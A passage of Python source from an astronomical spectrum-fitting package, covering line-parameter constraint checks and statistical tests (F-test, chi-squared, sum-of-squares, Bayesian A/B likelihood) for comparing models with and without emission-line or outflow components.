if (comp_options["fit_narrow"]==True) or ("na" in [line_list[line]["line_type"] for line in line_list]):
line_par_input["NA_VOFF"] = {"init": 0.0,
"plim":(-500.0,500.0)}
if (comp_options["fit_broad"]==True) or ("br" in [line_list[line]["line_type"] for line in line_list]):
line_par_input["BR_VOFF"] = {"init": 0.0,
"plim":(-1000.0,1000.0)}
if (comp_options["fit_outflow"]==True) or ("out" in [line_list[line]["line_type"] for line in line_list]):
line_par_input["OUT_VOFF"] = {"init": 0.0,
"plim":(-1000.0,1000.0)}
if (comp_options["fit_absorp"]==True) or ("abs" in [line_list[line]["line_type"] for line in line_list]):
line_par_input["ABS_VOFF"] = {"init": 0.0,
"plim":(-500.0,500.0)}
return line_par_input
##################################################################################
#### Check Line Hard Constraints #################################################
def check_hard_cons(lam_gal,galaxy,comp_options,line_list,line_par_input,par_input,verbose=True):
# Get list of all params
# param_dict = {par:0 for par in line_par_input}
param_dict = {par:0 for par in {**par_input,**line_par_input}}
for line in list(line_list):
for hpar in line_list[line]:
if (line_list[line][hpar]!="free") and (hpar in ["amp","fwhm","voff","h3","h4","h5","h6","h7","h8","h9","h10","shape"]):
if (isinstance(line_list[line][hpar],(int,float))):
line_list[line][hpar] = float(line_list[line][hpar])
pass
else:
try:
ne.evaluate(line_list[line][hpar], local_dict = param_dict).item()
except:
if verbose:
print("Hard-constraint %s not found in parameter list or could not be parsed; converting to free parameter.\n" % line_list[line][hpar])
_line_list = {line:line_list[line]}
_line_list[line][hpar]="free"
_line_par_input = initialize_line_pars(lam_gal,galaxy,comp_options,_line_list)
line_par_input = {**_line_par_input,**line_par_input}
return line_list, line_par_input
##################################################################################
#### Check Line Soft Constraints #################################################
def check_soft_cons(soft_cons,line_par_input,verbose=True):
# par_list = [p for p in line_par_input]
out_cons = []
# print(soft_cons)
# Old method
# for con in soft_cons:
# if (np.all([c in par_list for c in con])):
# out_cons.append(con)
# else:
# if verbose:
# print("\n - %s soft constraint removed because one or more free parameters is not available." % str(con))
# New method
# Map line parameters to init
line_par_dict = {l:line_par_input[l]["init"] for l in line_par_input}
for con in soft_cons:
# print(con)
valid_cons = []
for c in con:
try:
val = ne.evaluate(c,local_dict = line_par_dict).item()
# print(c, val, "True")
valid_cons.append(True)
except KeyError:
valid_cons.append(False)
# print(c, "False")
# print(valid_cons)
if np.all(valid_cons):
out_cons.append(con)
else:
if verbose:
print("\n - %s soft constraint removed because one or more free parameters is not available." % str(con))
# for p in line_par_input:
# print(p)
# print(out_cons)
# sys.exit()
return out_cons
##################################################################################
#### Output Free Parameters ######################################################
def output_free_pars(line_list,par_input,soft_cons):
print("\n----------------------------------------------------------------------------------------------------------------------------------------")
print("\n----------------------------------------------------------------------------------------------------------------------------------------")
print("\n Line List:")
nfree = 0
print("\n----------------------------------------------------------------------------------------------------------------------------------------")
for line in sorted(list(line_list)):
print("{0:<30}{1:<30}{2:<30.2}".format(line, '',''))
for par in sorted(list(line_list[line])):
print("{0:<30}{1:<30}{2:<30}".format('', par,str(line_list[line][par])))
if line_list[line][par]=="free": nfree+=1
print("\n----------------------------------------------------------------------------------------------------------------------------------------")
print("\n Number of Free Line Parameters: %d" % nfree)
print("\n----------------------------------------------------------------------------------------------------------------------------------------")
print("\n All Free Parameters:")
print("\n----------------------------------------------------------------------------------------------------------------------------------------")
nfree = 0
for par in sorted(list(par_input)):
print("{0:<30}{1:<30}{2:<30.2}".format(par, '',''))
nfree+=1
for hpar in sorted(list(par_input[par])):
print("{0:<30}{1:<30}{2:<30}".format('', hpar,str(par_input[par][hpar])))
print("\n----------------------------------------------------------------------------------------------------------------------------------------")
print("\n Total number of free parameters: %d" % nfree)
print("\n----------------------------------------------------------------------------------------------------------------------------------------")
print("\n Soft Constraints:\n")
for con in soft_cons:
print("{0:>30}{1:<0}{2:<0}".format(con[0], ' > ',con[1]))
print("\n----------------------------------------------------------------------------------------------------------------------------------------")
print("\n----------------------------------------------------------------------------------------------------------------------------------------")
return
##################################################################################
#### Outflow Tests ################################################################
def ssr_test(resid_outflow,
resid_no_outflow,
run_dir):
"""
Sum-of-Squares of Residuals test:
The sum-of-squares of the residuals of the no-outflow model
and the sum-of-squares of the residuals of outflow model for each iteration
of the outflow test.
"""
# For multiple runs
ssr_ratio = np.empty(np.shape(resid_outflow)[0])
ssr_outflow = np.empty(np.shape(resid_outflow)[0])
ssr_no_outflow = np.empty(np.shape(resid_outflow)[0])
for i in range(np.shape(resid_outflow)[0]):
# Compute median and std of residual standard deviations
ssr_resid_outflow = np.sum(resid_outflow[i,:]**2)
ssr_resid_no_outflow = np.sum(resid_no_outflow[i,:]**2)
ssr_ratio[i] = (ssr_resid_no_outflow)/(ssr_resid_outflow) # sum-of-squares ratio
ssr_outflow[i] = ssr_resid_outflow
ssr_no_outflow[i] = ssr_resid_no_outflow
if (np.shape(resid_outflow)[0]>1):
return np.median(ssr_ratio), np.std(ssr_ratio), \
np.median(ssr_no_outflow), np.std(ssr_no_outflow), \
np.median(ssr_outflow), np.std(ssr_outflow)
else:
return ssr_ratio[0], 0.0, ssr_no_outflow[0], 0.0, ssr_outflow[0], 0.0
def f_test(resid_outflow,
resid_no_outflow,
k1,
k2,
run_dir):
"""
f-test:
Perform an f-statistic for model comparison between a single and double-component
model for the [OIII] line. The f_oneway test is only accurate for normally-distributed
values and should be compared against the Kruskal-Wallis test (non-normal distributions),
as well as the Bartlett and Levene variance tests. We use the sum-of-squares of residuals
for each model for the test.
"""
f_stat = np.empty(np.shape(resid_outflow)[0])
f_pval = np.empty(np.shape(resid_outflow)[0])
# k1 = 3.0 # simpler model; single-Gaussian deg. of freedom
# k2 = 6.0 # (nested) complex model; double-Gaussian model deg. of freedom
for i in range(np.shape(resid_outflow)[0]):
RSS1 = np.sum(resid_no_outflow[i,:]**2) # resid. sum of squares single_Gaussian
RSS2 = np.sum(resid_outflow[i,:]**2) # resid. sum of squares double-Gaussian
n = float(len(resid_outflow[i,:]))
dfn = k2 - k1 # deg. of freedom numerator
dfd = n - k2 # deg. of freedom denominator
f_stat[i] = ((RSS1-RSS2)/(k2-k1))/((RSS2)/(n-k2))
f_pval[i] = 1 - f.cdf(f_stat[i], dfn, dfd)
# print('f-statistic model comparison = %0.2f +/- %0.2f, p-value = %0.2e +/- %0.2f' % (np.median(f_stat), np.std(f_stat),np.median(f_pval), np.std(f_pval) ))
# print('f-statistic model comparison = %0.2f ' % (f_stat))
if (len(f_pval)>1):
outflow_conf, outflow_conf_err = 1.0-np.median(f_pval),(1.0-np.median(f_pval))-(1-(np.median(f_pval)+np.std(f_pval)))
return np.median(f_stat), np.std(f_stat), np.median(f_pval), np.std(f_pval), outflow_conf, outflow_conf_err
else:
outflow_conf, outflow_conf_err = 1.0-(f_pval), 0.0
return f_stat[0], 0.0, f_pval[0], 0.0, outflow_conf[0], 0.0
def chi2_metric(eval_ind,
mccomps_outflow,
mccomps_no_outflow):
# Outflow
chi2_outflow_arr = np.empty(np.shape(mccomps_outflow["DATA"])[0])
pval_outflow_arr = np.empty(np.shape(mccomps_outflow["DATA"])[0])
for i in range(np.shape(mccomps_no_outflow["DATA"])[0]):
f_obs = mccomps_outflow["DATA"][i,:][eval_ind]/np.sum(mccomps_outflow["DATA"][i,:][eval_ind])
f_exp = mccomps_outflow["MODEL"][i,:][eval_ind]/np.sum(mccomps_outflow["MODEL"][i,:][eval_ind])
chi2_outflow_arr[i], pval_outflow_arr[i] = chisquare(f_obs=f_obs,
f_exp=f_exp
)
chi2_outflow, chi2_outflow_err = np.median(chi2_outflow_arr), np.std(chi2_outflow_arr)
# No outflow
chi2_no_outflow_arr = np.empty(np.shape(mccomps_no_outflow["DATA"])[0])
pval_no_outflow_arr = np.empty(np.shape(mccomps_no_outflow["DATA"])[0])
for i in range(np.shape(mccomps_no_outflow["DATA"])[0]):
f_obs = mccomps_no_outflow["DATA"][i,:][eval_ind]/np.sum(mccomps_no_outflow["DATA"][i,:][eval_ind])
f_exp = mccomps_no_outflow["MODEL"][i,:][eval_ind]/np.sum(mccomps_no_outflow["MODEL"][i,:][eval_ind])
chi2_no_outflow_arr[i], pval_no_outflow_arr[i] = chisquare(f_obs=f_obs,
f_exp=f_exp
)
chi2_no_outflow, chi2_no_outflow_err = np.median(chi2_no_outflow_arr), np.std(chi2_no_outflow_arr)
# Calculate Ratio
# The ratio of chi-squared values is defined as the improvement of the outflow model over the no-outflow model,
# i.e., 1.0-(chi2_outflow/chi2_no_outflow)
chi2_ratio = 1.0-(chi2_outflow/chi2_no_outflow)
chi2_ratio_err = chi2_ratio*np.sqrt((chi2_no_outflow_err/chi2_no_outflow)**2+(chi2_outflow_err/chi2_outflow)**2)
return chi2_outflow, chi2_outflow_err, chi2_no_outflow, chi2_no_outflow_err, chi2_ratio, chi2_ratio_err
def bayesian_AB_test(resid_line, resid_no_line, line, wave, noise, data, min_wave, max_wave, eval_ind, nchannel,run_dir):
"""
Performs a Bayesian A/B hypothesis test for the
likelihood distributions for two models.
"""
# Plot
fig = plt.figure(figsize=(18,10))
gs = gridspec.GridSpec(2, 4)
gs.update(wspace=0.35, hspace=0.35) # set the spacing between axes.
ax1 = plt.subplot(gs[0,0:4])
ax2 = plt.subplot(gs[1,0])
ax3 = plt.subplot(gs[1,1])
ax4 = plt.subplot(gs[1,2])
ax5 = plt.subplot(gs[1,3])
fontsize=16
#
plt.suptitle(r"BADASS A/B Likelihood Comparison Test",fontsize=fontsize)
# ax1.plot(wave,resid_line,color="xkcd:bright aqua",linestyle="-",linewidth=0.5,label="Resid. with Line")
# ax1.plot(wave,resid_no_line,color="xkcd:bright purple",linestyle="-",linewidth=0.5,label="Resid. without Line")
ax1.plot(wave,resid_no_line-resid_line,color="xkcd:bright red",linestyle="-",linewidth=1.0,label=r"$\Delta~\rm{Residuals}$")
ax1.plot(wave,noise,color="xkcd:lime green",linestyle="-",linewidth=0.5,label="Noise")
ax1.plot(wave,-noise,color="xkcd:lime green",linestyle="-",linewidth=0.5)
# ax1.axvline(min_wave,color="xkcd:red",linestyle="--",linewidth=1,label="Line Test Region")
# ax1.axvline(max_wave,color="xkcd:red",linestyle="--",linewidth=1)
ax1.axhline(0,color="xkcd:white",linestyle="--",linewidth=0.75)
ax1.set_xlabel(r"$\lambda_{\rm{rest}}$ [$\rm{\AA}$]",fontsize=fontsize)
ax1.set_ylabel(r"$f_\lambda$ [$10^{-17}$ erg cm$^{-2}$ s$^{-1}$ $\rm{\AA}^{-1}$]",fontsize=fontsize)
ax1.set_title(r"Fitting Region Residuals",fontsize=fontsize)
ax1.tick_params(axis='both', labelsize= fontsize)
ax1.set_xlim(np.min(wave),np.max(wave))
ax1.legend(fontsize=12)
#
# Sample the noise around the best-fit
nsamp = 10000
resid_line_lnlike = np.empty(nsamp)
resid_no_line_lnlike = np.empty(nsamp)
for i in range(nsamp):
lnlike_line = np.sum(-0.5*(np.random.normal(loc=resid_line[eval_ind],scale=noise[eval_ind],size=len(eval_ind)))**2/noise[eval_ind]**2)
lnlike_no_line = np.sum(-0.5*(np.random.normal(loc=resid_no_line[eval_ind],scale=noise[eval_ind],size=len(eval_ind)))**2/noise[eval_ind]**2)
resid_line_lnlike[i] = lnlike_line
resid_no_line_lnlike[i] = lnlike_no_line
#
ax2.hist(resid_line_lnlike,bins="doane",histtype="step",label="Line",density=True,color="xkcd:bright aqua",linewidth=0.5)
p_line = np.percentile(resid_line_lnlike,[16,50,84])
ax2.axvline(p_line[1],color="xkcd:bright aqua", linestyle='--', linewidth=1,)
ax2.axvspan(p_line[0], p_line[2], alpha=0.25, color='xkcd:bright aqua')
#
ax2.hist(resid_no_line_lnlike,bins="doane",histtype="step",label="No Line",density=True,color="xkcd:bright orange",linewidth=0.5)
p_no_line = np.percentile(resid_no_line_lnlike,[16,50,84])
ax2.axvline(p_no_line[1],color="xkcd:bright orange", linestyle='--', linewidth=1,)
ax2.axvspan(p_no_line[0], p_no_line[2], alpha=0.25, color='xkcd:bright orange')
ax2.set_title("Log-Likelihood",fontsize=fontsize)
ax2.tick_params(axis='both', labelsize= fontsize)
ax2.legend()
# The sampled log-likelihoods should be nearly Gaussian
x = np.arange(np.min([resid_line_lnlike, resid_no_line_lnlike]),np.max([resid_line_lnlike, resid_no_line_lnlike]),0.1)
norm_line = stats.norm(loc=p_line[1],scale=np.mean([p_line[2]-p_line[1],p_line[1]-p_line[0]]))
norm_no_line = stats.norm(loc=p_no_line[1],scale=np.mean([p_no_line[2]-p_no_line[1],p_no_line[1]-p_no_line[0]]))
#
ax2.plot(x,norm_line.pdf(x),color="xkcd:bright aqua",linewidth=1)
ax2.plot(x,norm_no_line.pdf(x),color="xkcd:bright orange",linewidth=1)
#
# Determine which distribution has the maximum likelihood.
# Null Hypothesis, H0: B is no different than A
# Alternative Hypothesis, H1: B is significantly different from A
A = resid_no_line_lnlike # no line model
A_mean = p_no_line[1]
B = resid_line_lnlike # line model
ntrials = 10000
B_samples = norm_line.rvs(size=ntrials)
pvalues = np.array([(norm_no_line.sf(b)) for b in B_samples])*2.0
pvalues[pvalues>1] = 1
pvalues[pvalues<1e-6] = 0
conf = (1 - pvalues)
#
ax3.hist(pvalues,bins="doane",histtype="step",label="Line",density=True,color="xkcd:bright aqua",linewidth=0.5)
p_pval = np.percentile(pvalues,[16,50,84])
ax3.axvline(p_pval[1],color="xkcd:bright aqua", linestyle='--', linewidth=1,)
ax3.axvspan(p_pval[0], p_pval[2], alpha=0.25, color='xkcd:bright aqua')
ax3.set_title(r"$p$-values",fontsize=fontsize)
#
ax4.hist(conf,bins="doane",histtype="step",label="No Line",density=True,color="xkcd:bright aqua",linewidth=0.5)
p_conf = np.percentile(conf,[16,50,84])
# np.save(run_dir.joinpath("conf_arr.npy"),conf)
ax4.axvline(p_conf[1],color="xkcd:bright aqua", linestyle='--', linewidth=1,)
ax4.axvspan(p_conf[0], p_conf[2], alpha=0.25, color='xkcd:bright aqua')
ax4.set_title(r"Confidence",fontsize=fontsize)
ax3.tick_params(axis='both', labelsize= fontsize)
#
ax4.tick_params(axis='both', labelsize= fontsize)
#
# print(" p-value = %0.4f +/- (%0.4f,%0.4f)" % (p_pval[1],p_pval[2]-p_pval[1],p_pval[1]-p_pval[0]))
# print(" Confidence = %0.4f +/- (%0.4f,%0.4f)" % (p_conf[1],p_conf[2]-p_conf[1],p_conf[1]-p_conf[0]))
#
d = np.abs(p_line[1] - p_no_line[1]) # statistical distance
disp = np.sqrt((np.mean([p_line[2]-p_line[1],p_line[1]-p_line[0]]))**2+(np.mean([p_no_line[2]-p_no_line[1],p_no_line[1]-p_no_line[0]]))**2) # total dispersion
signif = d/disp # significance
overlap = np.min([(p_line[2]-p_no_line[0]), (p_no_line[2]-p_line[0])]).clip(0) # 1-sigma overlap
ax5.axvline(0.0,color="black",label="\n $p$-value = %0.4f +/- (%0.4f, %0.4f)" % (p_pval[1],p_pval[2]-p_pval[1],p_pval[1]-p_pval[0]))
ax5.axvline(0.0,color="black",label="\n Confidence = %0.4f +/- (%0.4f, %0.4f)" % (p_conf[1],p_conf[2]-p_conf[1],p_conf[1]-p_conf[0]))
ax5.axvline(0.0,color="black",label="\n Statistical Distance = %0.4f" % d)
ax5.axvline(0.0,color="black",label="\n Combined Dispersion = %0.4f" % disp)
ax5.axvline(0.0,color="black",label="\n Significance ($\sigma$) = %0.4f" % signif)
ax5.axvline(0.0,color="black",label="\n $1\sigma$ Overlap = %0.4f \n" % overlap)
ax5.legend(loc="center",fontsize=fontsize,frameon=False)
ax5.axis('off')
fig.tight_layout()
plt.savefig(run_dir.joinpath('test_results.pdf'))
plt.close()
return p_pval[1],p_pval[2]-p_pval[1],p_pval[1]-p_pval[0], p_conf[1],p_conf[2]-p_conf[1],p_conf[1]-p_conf[0], d, disp, signif, overlap
##################################################################################
def line_test(param_dict,
line_list,
combined_line_list,
soft_cons,
lam_gal,
galaxy,
noise,
z,
cosmology,
fit_reg,
user_lines,
user_constraints,
combined_lines,
test_line,
comp_options,
losvd_options,
host_options,
power_options,
poly_options,
opt_feii_options,
uv_iron_options,
balmer_options,
outflow_test_options,
host_template,
opt_feii_templates,
uv_iron_template,
balmer_template,
stel_templates,
fwhm_gal,
fit_mask,
velscale,
run_dir,
fit_type='init',
fit_stat="RCHI2",
output_model=False,
test_outflows=False,
n_basinhop=5,
max_like_niter=10,
verbose=True,
binnum=None,
spaxelx=None,
spaxely=None):
"""
Performs component (or line) testing based on user input wavelength range.
"""
if (test_outflows==True):
remove_lines = [line for line in line_list if line_list[line]["line_type"]=="out"]
elif (test_outflows==False):
if isinstance(test_line["line"],str):
remove_lines = [test_line["line"]]
elif isinstance(test_line["line"],list):
remove_lines = test_line["line"]
# # Perform fitting with line
if verbose:
print('\n Fitting with %s...' % remove_lines)
mcpars_line, mccomps_line, mcLL_line = max_likelihood(param_dict,
line_list,
combined_line_list,
soft_cons,
lam_gal,
galaxy,
noise,
z,
cosmology,
comp_options,
losvd_options,
host_options,
power_options,
poly_options,
opt_feii_options,
uv_iron_options,
balmer_options,
outflow_test_options,
host_template,
opt_feii_templates,
uv_iron_template,
balmer_template,
stel_templates,
fwhm_gal,
fit_mask,
velscale,
run_dir,
fit_type='init',
fit_stat=fit_stat,
output_model=False,
test_outflows=True,
n_basinhop=n_basinhop,
max_like_niter=max_like_niter,
verbose=verbose)
# Perform fitting without line
if verbose:
print('\n Fitting without %s...' % remove_lines)
# Make copy of original line list, since initialize_pars() will override it.
original_line_list = copy.deepcopy(line_list)
# Generate new parameters
param_dict_no_line, line_list_no_line, combined_line_list_no_line, soft_cons_no_line = initialize_pars(lam_gal,galaxy,noise,fit_reg,fwhm_gal,fit_mask,velscale,
comp_options,user_lines,user_constraints,combined_lines,losvd_options,host_options,power_options,poly_options,
opt_feii_options,uv_iron_options,balmer_options,
run_dir,fit_type='init',fit_stat=fit_stat,
fit_opt_feii=comp_options["fit_opt_feii"],fit_uv_iron=comp_options["fit_uv_iron"],fit_balmer=comp_options["fit_balmer"],
fit_losvd=comp_options["fit_losvd"],fit_host=comp_options["fit_host"],fit_power=comp_options["fit_power"],fit_poly=comp_options["fit_poly"],
fit_narrow=comp_options["fit_narrow"],fit_broad=comp_options["fit_broad"],fit_outflow=comp_options["fit_outflow"],fit_absorp=comp_options["fit_absorp"],
tie_line_fwhm=comp_options["tie_line_fwhm"],tie_line_voff=comp_options["tie_line_voff"],remove_lines=remove_lines,verbose=verbose)
mcpars_no_line, mccomps_no_line, mcLL_no_line = max_likelihood(param_dict_no_line,
line_list_no_line,
combined_line_list_no_line,
soft_cons_no_line,
lam_gal,
galaxy,
noise,
z,
cosmology,
comp_options,
losvd_options,
host_options,
power_options,
poly_options,
opt_feii_options,
uv_iron_options,
balmer_options,
outflow_test_options,
host_template,
opt_feii_templates,
uv_iron_template,
balmer_template,
stel_templates,
fwhm_gal,
fit_mask,
velscale,
run_dir,
fit_type='init',
fit_stat=fit_stat,
output_model=False,
test_outflows=True,
n_basinhop=n_basinhop,
max_like_niter=max_like_niter,
verbose=verbose)
# if fit_stat = "RCHI2", we need to scale the input noise so that the
# line tests are using the properly scaled noise.
if fit_stat=="RCHI2":
noise *= np.nanmean([mcpars_line["NOISE_SCALE"]["med"], mcpars_no_line["NOISE_SCALE"]["med"]])
# Determine wavelength bounds of F-test. For [OIII]5007, we use the full profile (core + outflow)
# and determine the 0.1 and 99.9 percentiles of the flux of the full profile to set the bounds
# of the test.
if isinstance(remove_lines,str):
full_profile = np.median(mccomps_line[remove_lines],axis=0)
elif isinstance(remove_lines,list):
full_profile = np.median(np.sum([mccomps_line[l] for l in remove_lines],axis=1),axis=0)
# min_wave, max_wave, eval_ind, nchannel = get_wavelength_range(lam_gal,noise,velscale,full_profile,line_list[test_line["line"]])
min_wave, max_wave, eval_ind, nchannel = get_wavelength_range(lam_gal[fit_mask],noise[fit_mask],velscale,full_profile[fit_mask])#,line_list[test_line["line"]])
# storage arrays for residuals in [OIII] test region
resid_line = np.empty((max_like_niter+1,nchannel))
resid_no_line = np.empty((max_like_niter+1,nchannel))
resid_total = np.empty((max_like_niter+1,len(lam_gal[fit_mask])))
for i in range(max_like_niter+1):
resid_line[i,:] = mccomps_line['RESID'][i,:][fit_mask][eval_ind]
resid_no_line[i,:] = mccomps_no_line['RESID'][i,:][fit_mask][eval_ind]
resid_total[i,:] = mccomps_line['RESID'][i,:][fit_mask]
# Perform Bayesian A/B test
pval, pval_upp, pval_low, conf, conf_upp, conf_low, dist, disp, signif, overlap = bayesian_AB_test(mccomps_line['RESID'][0,:][fit_mask], mccomps_no_line['RESID'][0,:][fit_mask], full_profile[fit_mask], lam_gal[fit_mask], noise[fit_mask], galaxy[fit_mask], min_wave, max_wave, eval_ind, nchannel, run_dir)
# Calculate sum-of-square of residuals and its uncertainty
ssr_ratio, ssr_ratio_err, ssr_no_line, ssr_no_line_err, ssr_line, ssr_line_err = ssr_test(resid_line,resid_no_line,run_dir)
# Perform f-test model comparison(for normally distributed model residuals)
f_stat, f_stat_err, f_pval, f_pval_err, f_conf, f_conf_err = f_test(resid_line,resid_no_line,1.0,4.0,run_dir)
# Calculate total residual noise
resid_noise_no_line = np.median([np.std(resid_no_line[i,:]) for i in range(np.shape(resid_no_line)[0])])
resid_noise_no_line_err = np.std([np.std(resid_no_line[i,:]) for i in range(np.shape(resid_no_line)[0])])
resid_noise_line = np.median([np.std(resid_line[i,:]) for i in range(np.shape(resid_line)[0])])
resid_noise_line_err = np.std([np.std(resid_line[i,:]) for i in range(np.shape(resid_line)[0])])
total_resid_noise = np.median([np.std(resid_total[i,:]) for i in range(np.shape(resid_total)[0])])
total_resid_noise_err = np.std([np.std(resid_total[i,:]) for i in range(np.shape(resid_total)[0])])
# Chi2 Metrics
# Chi-squared is evaluated in the region of the line for the two models
# The ratio of chi squared for the outflow to the no-outflow model indicates
# how much the model improved over the other.
chi2_line, chi2_line_err, chi2_no_line, chi2_no_line_err, chi2_ratio, chi2_ratio_err = chi2_metric(range(len(lam_gal)),mccomps_line, mccomps_no_line)
if verbose:
print('\n{0:<30}{1:<30}{2:<30}{3:<30}'.format('Parameter', 'Best-fit Value', '+/- 1-sigma','Flag'))
print('-----------------------------------------------------------------------------------------------------')
# Sort into arrays
pname = []
med = []
std = []
flag = []
for key in mcpars_line:
pname.append(key)
med.append(mcpars_line[key]['med'])
std.append(mcpars_line[key]['std'])
flag.append(mcpars_line[key]['flag'])
i_sort = np.argsort(pname)
pname = np.array(pname)[i_sort]
med = np.array(med)[i_sort]
std = np.array(std)[i_sort]
flag = np.array(flag)[i_sort]
if verbose:
for i in range(0,len(pname),1):
print('{0:<30}{1:<30.2f}{2:<30.2f}{3:<30}'.format(pname[i], med[i], std[i], flag[i]))
print('-----------------------------------------------------------------------------------------------------')
print('\n Test Statistics:')
print('-----------------------------------------------------------------------------------------------------')
print('{0:<30}{1:<30}{2:<30}{3:<30}'.format('','Statistic','Value','Uncertainty') )
print('-----------------------------------------------------------------------------------------------------')
print('{0:<30}'.format('A/B Likelihood Test::'))
print('{0:<30}{1:<30}{2:<30.6f}{3:<30}'.format('','Confidence:',conf,"(-%0.6f,+%0.6f)" % (conf_low,conf_upp )) )
print('{0:<30}{1:<30}{2:<30.6f}{3:<30}'.format('','p-value:',pval,"(-%0.6f,+%0.6f)" % (pval_low,pval_upp)))
print('{0:<30}{1:<30}{2:<30.6f}'.format('','Statistical Distance:',dist))
print('{0:<30}{1:<30}{2:<30.6f}'.format('','Disperson:',disp))
print('{0:<30}{1:<30}{2:<30.6f}'.format('','Significance (sigma):',signif))
print('{0:<30}{1:<30}{2:<30.6f}'.format('','Overlap (1-sigma):',overlap))
print('{0:<30}'.format('ANOVA (F-test):'))
print('{0:<30}{1:<30}{2:<30.4f}{3:<30.4f}'.format('','Confidence:',f_conf, f_conf_err ) )
print('{0:<30}{1:<30}{2:<30.4f}{3:<30.4f}'.format('','F-statistic:',f_stat,f_stat_err))
print('{0:<30}{1:<30}{2:<30.4e}{3:<30.4e}'.format('','p-value:',f_pval,f_pval_err))
print('{0:<30}'.format('Chi-Squared Metrics:'))
print('{0:<30}{1:<30}{2:<30.6f}{3:<30.6f}'.format('','Chi-squared Ratio:',chi2_ratio, chi2_ratio_err ) )
print('{0:<30}{1:<30}{2:<30.6f}{3:<30.6f}'.format('','Chi-squared no-outflow:',chi2_no_line,chi2_no_line_err))
print('{0:<30}{1:<30}{2:<30.6f}{3:<30.6f}'.format('','Chi-squared outflow:',chi2_line,chi2_line_err))
print('{0:<30}'.format('Sum-of-Squares of Residuals (SSR):'))
print('{0:<30}{1:<30}{2:<30.6f}{3:<30.6f}'.format('','SSR ratio:',ssr_ratio,ssr_ratio_err))
print('{0:<30}{1:<30}{2:<30.6f}{3:<30.6f}'.format('','SSR no-outflow:',ssr_no_line,ssr_no_line_err))
print('{0:<30}{1:<30}{2:<30.6f}{3:<30.6f}'.format('','SSR outflow:',ssr_line,ssr_line_err))
print('{0:<30}'.format('Residual Noise:'))
print('{0:<30}{1:<30}{2:<30.6f}{3:<30.6f}'.format('','Median spec noise:',np.median(noise),np.std(noise)))
print('{0:<30}{1:<30}{2:<30.6f}{3:<30.6f}'.format('','Total resid noise:',total_resid_noise,total_resid_noise_err))
print('{0:<30}{1:<30}{2:<30.6f}{3:<30.6f}'.format('','No-line resid:',resid_noise_no_line,resid_noise_no_line_err))
print('{0:<30}{1:<30}{2:<30.6f}{3:<30.6f}'.format('','Line resid:',resid_noise_line,resid_noise_line_err))
print('-----------------------------------------------------------------------------------------------------')
# Write to log
write_log(mcpars_no_line,'no_line_test',run_dir)
write_log(mcpars_line,'line_test',run_dir)
write_log((pval, pval_upp, pval_low, conf, conf_upp, conf_low, dist, disp, signif, overlap,
f_conf,f_conf_err,f_stat,f_stat_err,f_pval,f_pval_err,
chi2_ratio,chi2_ratio_err,chi2_no_line,chi2_no_line_err,chi2_line,chi2_line_err,
# amp_metric,fwhm_metric,voff_metric,voff_metric_err,
ssr_ratio,ssr_ratio_err,ssr_no_line,ssr_no_line_err,ssr_line,ssr_line_err,
np.median(noise), np.std(noise),
total_resid_noise,total_resid_noise_err,resid_noise_no_line,resid_noise_no_line_err,resid_noise_line,resid_noise_line_err),
'line_test_stats',run_dir)
# Write test statistics to FITS table
stats_dict = {
"PVAL": {"best": pval, "sigma_low": pval_low, "sigma_upp": pval_upp },
"CONF": {"best": conf, "sigma_low": conf_low, "sigma_upp": conf_upp},
"DIST": {"best": dist, "sigma_low": 0.0, "sigma_upp": 0.0},
"DISP": {"best": disp, "sigma_low": 0.0, "sigma_upp": 0.0},
"SIGNIF": {"best": signif, "sigma_low": 0.0, "sigma_upp": 0.0},
"OVERLAP": {"best": overlap, "sigma_low": 0.0, "sigma_upp": 0.0},
"F_CONF": {"best": f_conf, "sigma_low": f_conf_err, "sigma_upp": f_conf_err},
"F_STAT": {"best": f_stat, "sigma_low": f_stat_err, "sigma_upp": f_stat_err},
"F_PVAL": {"best": f_pval, "sigma_low": f_pval_err, "sigma_upp": f_pval_err},
"CHI2_LINE": {"best": chi2_line, "sigma_low": chi2_line_err, "sigma_upp": chi2_line_err},
"CHI2_NO_LINE": {"best": chi2_no_line, "sigma_low": chi2_no_line_err, "sigma_upp": chi2_no_line_err},
"CHI2_RATIO": {"best": chi2_ratio, "sigma_low": chi2_ratio_err, "sigma_upp": chi2_ratio_err},
"SSR_RATIO": {"best": ssr_ratio, "sigma_low": ssr_ratio_err, "sigma_upp": ssr_ratio_err},
"SSR_NO_LINE": {"best": ssr_no_line, "sigma_low": ssr_no_line_err, "sigma_upp": ssr_no_line_err},
"SSR_LINE": {"best": ssr_line, "sigma_low": ssr_line_err, "sigma_upp": ssr_line_err},
"MEDIAN_NOISE": {"best": np.median(noise), "sigma_low": np.std(noise), "sigma_upp": np.std(noise)},
"RESID_NOISE": {"best": total_resid_noise, "sigma_low": total_resid_noise_err, "sigma_upp": total_resid_noise_err},
"RESID_NOISE_NO_LINE": {"best": resid_noise_no_line, "sigma_low": resid_noise_no_line_err, "sigma_upp": resid_noise_no_line_err},
"RESID_NOISE_LINE": {"best": resid_noise_line, "sigma_low": resid_noise_line_err, "sigma_upp": resid_noise_line_err},
}
write_test_stats(stats_dict,run_dir)
# Reinstate the original line list
line_list = original_line_list
# Make plot
# Get best fit model components for each model
param_names_line = [key for key in param_dict ]
params_line = [mcpars_line[key]['med'] for key in param_dict ]
fit_type = 'line_test'
output_model = False
comp_dict_line = fit_model(params_line,
param_names_line,
line_list,
combined_line_list,
lam_gal,
galaxy,
noise,
comp_options,
losvd_options,
host_options,
power_options,
poly_options,
opt_feii_options,
uv_iron_options,
balmer_options,
outflow_test_options,
host_template,
opt_feii_templates,
uv_iron_template,
balmer_template,
stel_templates,
fwhm_gal,
fit_mask,
velscale,
run_dir,
fit_type,
fit_stat,
output_model)
param_names_no_line = [key for key in param_dict_no_line ]
params_no_line = [mcpars_no_line[key]['med'] for key in param_dict_no_line ]
fit_type = 'line_test'
output_model = False
comp_dict_no_line = fit_model(params_no_line,
param_names_no_line,
line_list_no_line,
combined_line_list_no_line,
lam_gal,
galaxy,
noise,
comp_options,
losvd_options,
host_options,
power_options,
poly_options,
opt_feii_options,
uv_iron_options,
balmer_options,
outflow_test_options,
host_template,
opt_feii_templates,
uv_iron_template,
balmer_template,
stel_templates,
fwhm_gal,
fit_mask,
velscale,
run_dir,
fit_type,
fit_stat,
output_model)
# Make comparison plots of outflow and no-outflow models
line_test_plot(lam_gal,comp_dict_line,comp_dict_no_line,line_list,line_list_no_line,
params_line,params_no_line,param_names_line,param_names_no_line,min_wave,max_wave,run_dir)
# Write results to FITS
